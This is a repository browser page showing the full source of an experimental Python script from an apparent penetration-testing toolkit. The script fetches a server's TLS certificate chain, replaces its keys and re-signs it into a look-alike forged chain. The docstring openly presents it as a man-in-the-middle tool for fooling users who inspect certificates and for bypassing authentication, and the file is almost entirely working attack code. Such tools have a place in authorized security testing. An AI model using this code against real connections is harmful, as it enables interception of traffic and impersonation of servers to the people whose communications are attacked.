Context Navigation

source: trunk/bin/bletchley-clonecertchain @ 72

Last change on this file since 72 was 72, checked in by tim, 10 years ago
Added experimental certificate chain cloning script
Property svn:executable set to ``*
File size: 7.3 KB

Line
1	#!/usr/bin/env python3
2
3	# Requires Python 3+
4
5	'''
6	An experimental script which attempts to clone a server certificate's entire
7	certificate chain, ideally altering only the keys and signatures along the
8	way.
9
10	This is useful in a few man-in-the-middle attack situations, including:
11	- You swap out certificates on a user and the manually inspect the certificate
12	properties before accepting them. Identical properties are more convincing.
13
14	- A product includes special-purpose certificate properties that are validated
15	with custom procedures (e.g. client user name, product serial number, ...).
16	If these properties are validated but the certificate's CA isn't, then cloning
17	the full set of certificate properties is essential to bypass the
18	authentication.
19
20	Currently, this script is somewhat limited and buggy, but will hopefully
21	improve over time. Patches welcome!
22
23
24	Copyright (C) 2014 Blindspot Security LLC
25	Author: Timothy D. Morgan
26
27	This program is free software: you can redistribute it and/or modify
28	it under the terms of the GNU Lesser General Public License, version 3,
29	as published by the Free Software Foundation.
30
31	This program is distributed in the hope that it will be useful,
32	but WITHOUT ANY WARRANTY; without even the implied warranty of
33	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
34	GNU General Public License for more details.
35
36	You should have received a copy of the GNU General Public License
37	along with this program. If not, see <http://www.gnu.org/licenses/>.
38	'''
39
40	import sys
41	import argparse
42	import traceback
43	import socket
44	try:
45	import OpenSSL
46	from OpenSSL import SSL
47	except:
48	sys.stderr.write('ERROR: Could not locate pyOpenSSL module. Under Debian-based systems, try:\n')
49	sys.stderr.write(' # apt-get install python3-openssl\n')
50	sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n')
51	sys.exit(2)
52
53
54	def createClientContext():
55	tlsClientContext = SSL.Context(SSL.SSLv3_METHOD)
56	tlsClientContext.set_verify(SSL.VERIFY_NONE, (lambda a,b,c,d,e: True))
57	return tlsClientContext
58
59
60	def fetchCertificateChain(host, port):
61	serverSock = socket.socket()
62	serverSock.connect((host,port))
63
64	try:
65	server = SSL.Connection(createClientContext(), serverSock)
66	server.set_connect_state()
67	server.do_handshake()
68	except Exception as e:
69	print("Exception during handshake with server: ")
70	traceback.print_exc(e)
71	return None
72
73	return server.get_peer_cert_chain()
74
75
76	def normalizeCertificateName(cert_name):
77	n = cert_name.get_components()
78	n.sort()
79	return tuple(n)
80
81
82	def normalizeCertificateChain(chain):
83	# Organize certificates by subject and issuer for quick lookups
84	subject_table = {}
85	issuer_table = {}
86	for c in chain:
87	subject_table[normalizeCertificateName(c.get_subject())] = c
88	issuer_table[normalizeCertificateName(c.get_issuer())] = c
89
90	# Now find root or highest-level intermediary
91	root = None
92	for c in chain:
93	i = normalizeCertificateName(c.get_issuer())
94	s = normalizeCertificateName(c.get_subject())
95	if (i == s) or (i not in subject_table):
96	if root != None:
97	sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.")
98	else:
99	# Go with the first identified "root", since that's more likely to link up with the server cert
100	root = c
101
102	# Finally, build the chain from the top-down in the correct order
103	new_chain = []
104	nxt = root
105	while nxt != None:
106	new_chain = [nxt] + new_chain
107	s = normalizeCertificateName(nxt.get_subject())
108	nxt = issuer_table.get(s)
109
110	return new_chain
111
112
113	def genFakeKey(certificate):
114	fake_key = OpenSSL.crypto.PKey()
115	old_pubkey = certificate.get_pubkey()
116	fake_key.generate_key(old_pubkey.type(), old_pubkey.bits())
117
118	return fake_key
119
120
121	def getDigestAlgorithm(certificate):
122	# XXX: ugly hack because pyopenssl API for this is limited
123	if b'md5' in certificate.get_signature_algorithm():
124	return 'md5'
125	else:
126	return 'sha1'
127
128
129	def deleteExtension(certificate, index):
130	import cffi
131	from cffi import FFI
132	ffi = FFI()
133	ffi.cdef('''void* X509_delete_ext(void* x, int loc);''')
134	libssl = ffi.dlopen('libssl.so')
135	ext = libssl.X509_delete_ext(certificate._x509, index)
136	#XXX: supposed to free ext here
137
138
139	def removePeskyExtensions(certificate):
140	#for index in range(0,certificate.get_extension_count()):
141	# e = certificate.get_extension(index)
142	# print("extension %d: %s\n" % (index, e.get_short_name()), e)
143
144	index = 0
145	while index < certificate.get_extension_count():
146	e = certificate.get_extension(index)
147	if e.get_short_name() in (b'subjectKeyIdentifier', b'authorityKeyIdentifier'):
148	deleteExtension(certificate, index)
149	#XXX: would be nice if each of these extensions were re-added with appropriate values
150	index -= 1
151	index += 1
152
153	#for index in range(0,certificate.get_extension_count()):
154	# e = certificate.get_extension(index)
155	# print("extension %d: %s\n" % (index, e.get_short_name()), e)
156
157
158	def genFakeCertificateChain(cert_chain):
159	ret_val = []
160	cert_chain.reverse() # start with highest level authority
161
162	c = cert_chain[0]
163	i = normalizeCertificateName(c.get_issuer())
164	s = normalizeCertificateName(c.get_subject())
165	if s != i:
166	# XXX: consider retrieving root locally and including a forged version instead
167	c.set_issuer(c.get_subject())
168	k = genFakeKey(c)
169	c.set_pubkey(k)
170	removePeskyExtensions(c)
171	c.sign(k, getDigestAlgorithm(c))
172	ret_val.append(c)
173
174	prev = k
175	for c in cert_chain[1:]:
176	k = genFakeKey(c)
177	c.set_pubkey(k)
178	removePeskyExtensions(c)
179	c.sign(prev, getDigestAlgorithm(c))
180	prev = k
181	ret_val.append(c)
182
183	ret_val.reverse()
184	return k,ret_val
185
186
187	parser = argparse.ArgumentParser(
188	description="An experimental script which attempts to clone an SSL server's"
189	" entire certificate chain, ideally altering only the keys and signatures"
190	" along the way. The script prints results to stdout, starting with a PEM"
191	" key (the fake server private key) followed by the newly forged certificate"
192	" chain, also in PEM format. (The new intermediate and root private keys are"
193	" not currently printed, but will likely be somehow availble in a future"
194	" version.)")
195
196	parser.add_argument('host', nargs=1, default=None,
197	help='IP address or host name of server')
198	parser.add_argument('port', nargs='?', default=443,
199	help='TCP port number of SSL service (default: 443)')
200	options = parser.parse_args()
201
202	#print("REAL CHAIN:")
203	chain = fetchCertificateChain(options.host[0],options.port)
204	#for c in chain:
205	# print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
206
207	#chain = normalizeCertificateChain(chain)
208	#for c in chain:
209	# print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))
210
211	#print("FAKE KEY AND CHAIN:")
212	fake_key, fake_chain = genFakeCertificateChain(chain)
213	print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8'))
214	for c in fake_chain:
215	print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8'))

Note: See TracBrowser for help on using the repository browser.

Download in other formats: